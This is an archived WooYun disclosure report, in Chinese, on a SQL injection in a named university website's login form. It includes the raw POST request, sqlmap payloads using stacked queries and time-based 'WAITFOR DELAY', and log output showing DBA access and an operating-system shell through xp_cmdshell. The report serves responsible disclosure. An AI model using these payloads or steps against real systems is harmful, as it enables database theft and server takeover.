乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-01: 细节已通知厂商并且等待厂商处理中 2015-12-01: 厂商已经确认,细节仅向厂商公开 2015-12-11: 细节向核心白帽子及相关领域专家公开 2015-12-21: 细节向普通白帽子公开 2015-12-31: 细节向实习白帽子公开 2016-01-15: 细节向公众公开
我又来挖登录处的sql注入了
0x01 漏洞描述登录处出现POST类型sql注入,经检测,注入得到用户为DBA权限,可直接写入shell,得到服务器权限,另外,数据库全部信息也不在话下了。0x02 漏洞网站
http://gsl.sdu.edu.cn/
0x03 漏洞出现位置登录处
0x04 漏洞请求HTTP参数
POST /indexlogin.jsp HTTP/1.1Host: gsl.sdu.edu.cnUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://gsl.sdu.edu.cn/index.jspCookie: JSESSIONID=9CE728665B08B18DAC710FE3EBF8A791Connection: keep-aliveuseraccount=aaa&userpassword=aaaaa
0x05 漏洞利用工具sqlmap
0x06 漏洞证明得到注入点类型信息
---Place: POSTParameter: useraccount Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: useraccount=aaa'; WAITFOR DELAY '0:0:5'--&userpassword=aaaaa Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: useraccount=aaa' WAITFOR DELAY '0:0:5'--&userpassword=aaaaa---[15:22:27] [INFO] testing Microsoft SQL Server[15:22:27] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] [15:22:34] [INFO] confirming Microsoft SQL Server[15:23:10] [INFO] the back-end DBMS is Microsoft SQL Serverback-end DBMS: Microsoft SQL Server 2008
数据库用户类型 DBA权限
[15:25:40] [INFO] testing if current user is DBAdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] current user is DBA: True
成功获取os-shell
[15:54:53] [INFO] retrieved: 0 [15:54:53] [INFO] fingerprinting the back-end DBMS operating system version and service pack[15:55:00] [INFO] the back-end DBMS operating system is Windows 7 Service Pack 0[15:55:01] [INFO] testing if current user is DBA[15:55:01] [INFO] checking if xp_cmdshell extended procedure is available, please wait..[15:55:12] [INFO] xp_cmdshell extended procedure is available[15:55:20] [INFO] testing if xp_cmdshell extended procedure is usable[15:58:29] [ERROR] invalid character detected. retrying..[15:58:29] [WARNING] increasing time delay to 6 seconds [15:59:31] [ERROR] invalid character detected. retrying..[15:59:31] [WARNING] increasing time delay to 7 seconds [16:01:22] [INFO] xp_cmdshell extended procedure is usable[16:01:22] [INFO] going to use xp_cmdshell extended procedure for operating system command execution[16:01:22] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTERos-shell>
然后执行命令什么的就不用我说了吧、危害性非常大的、点到为止吧、不做内网渗透了
过滤吧
危害等级:低
漏洞Rank:4
确认时间:2015-12-01 14:03
已通报系统所属单位
暂无